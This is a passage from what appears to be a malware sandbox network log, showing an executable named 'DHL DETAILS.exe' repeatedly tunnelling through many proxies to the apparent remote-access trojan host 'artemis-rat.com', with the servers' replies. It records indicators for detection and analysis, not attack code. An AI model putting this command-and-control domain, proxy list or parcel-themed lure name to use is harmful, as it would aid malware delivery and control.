                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1129192.168.2.553369221.153.92.39806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.216682911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.518409014 CET310INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 150
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1130192.168.2.552798117.160.250.16388286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.222601891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.885044098 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1131192.168.2.553374121.164.200.1810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.235796928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1132192.168.2.553370119.28.4.11299996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.236263990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1133192.168.2.553426201.174.239.2841536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.236728907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1134192.168.2.5534333.90.100.1231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.236965895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.453634977 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1135192.168.2.55337243.133.70.57156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.237473965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1136192.168.2.5533758.222.164.205156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.241411924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1137192.168.2.551572162.214.121.1129936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.251831055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1138192.168.2.55337914.103.24.2080006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.252338886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1139192.168.2.553377185.220.226.2358086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.260584116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1140192.168.2.553447184.170.249.6541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.260741949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1141192.168.2.553305117.160.250.13188996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.297360897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.136230946 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1142192.168.2.5534048.222.175.210505546352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.298748970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.102036953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1143192.168.2.553383144.24.122.46806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.310969114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.857870102 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:25 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                                                                    Mar 9, 2024 13:14:25.858027935 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                                                                    Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1144192.168.2.553437194.247.173.1780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.326685905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1145192.168.2.55344643.131.246.77156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.381680965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1146192.168.2.55344594.45.74.6080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.382507086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1147192.168.2.553396103.86.109.38806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.382512093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.799325943 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1148192.168.2.55344894.177.106.17823246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.384763956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1149192.168.2.55344982.113.157.122312806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.385910034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1150192.168.2.55342945.150.25.13280806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.386652946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.248755932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.567810059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1151192.168.2.55306238.162.8.23231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.443603039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.883591890 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1152192.168.2.55345123.137.248.19788886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.444212914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1153192.168.2.55345246.35.9.110806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.448201895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1154192.168.2.553419154.118.228.212806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.450253010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1155192.168.2.553431122.114.232.1378086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.462574959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.380148888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1156192.168.2.55345043.128.146.42156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.475897074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1157192.168.2.553583103.133.222.1704436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.478075027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1158192.168.2.55345651.79.87.144417466352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.478883982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.020772934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.724118948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.039036036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1159192.168.2.553588103.133.222.1704436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.480273008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1160192.168.2.553595103.133.222.1704436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.482002020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1161192.168.2.553600103.133.222.1704436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.483387947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1162192.168.2.553493104.16.108.149806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
